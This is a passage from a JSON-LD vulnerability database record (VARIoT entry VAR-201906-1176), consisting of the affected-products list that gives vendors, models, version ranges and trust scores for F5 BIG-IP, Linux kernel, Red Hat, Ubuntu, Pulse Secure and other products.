      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201906-1176",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.1.11"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.182"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "enterprise linux atomic host",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "pulse policy secure",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "pulsesecure",
        "version": null
      },
      {
        "model": "pulse secure virtual application delivery controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "pulsesecure",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.10"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "traffix signaling delivery controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "5.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.5"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "connect secure",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ivanti",
        "version": null
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.127"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "enterprise linux aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.182"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.52"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.04"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "traffix signaling delivery controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "5.0.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise mrg",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "2.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "enterprise linux aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "arch linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "arista",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "check point",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "coreos",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "debian gnu linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "suse linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "synology",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ubuntu",
        "version": null
      },
      {
        "model": "ubuntu",
        "scope": null,
        "trust": 0.8,
        "vendor": "canonical",
        "version": null
      },
      {
        "model": "big-ip access policy manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip analytics",
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip application security manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip domain name system",
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip edge gateway",
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip fraud protection service",
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip global traffic manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip link controller",
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip local traffic manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip webaccelerator",
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "traffix sdc",
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "connect secure",
        "scope": null,
        "trust": 0.8,
        "vendor": "pulse secure",
        "version": null
      },
      {
        "model": "policy secure",
        "scope": null,
        "trust": 0.8,
        "vendor": "pulse secure",
        "version": null
      },
      {
        "model": "virtual application delivery controller",
        "scope": null,
        "trust": 0.8,
        "vendor": "pulse secure",
        "version": null
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "none"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "aus"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "eus"
      },
      {
        "model": "enterprise linux atomic host",
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": "enterprise mrg",
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": "virtualization",
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "big-ip dns hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.3"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.5"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.4"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.9"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "oncommand unified manager for vmware vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "9.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.38"
      },
      {
        "model": "threat intelligence exchange server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.12"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.10"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.7"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.6"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.7"
      },
      {
        "model": "big-ip aam hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip ltm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-iq centralized management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.88"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.3"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.5"
      },
      {
        "model": "network threat behavior analysis appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.5"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0"
      },
      {
        "model": "enterprise linux atomic host",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "0"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.4"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "8.0"
      },
      {
        "model": "big-ip link controller hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
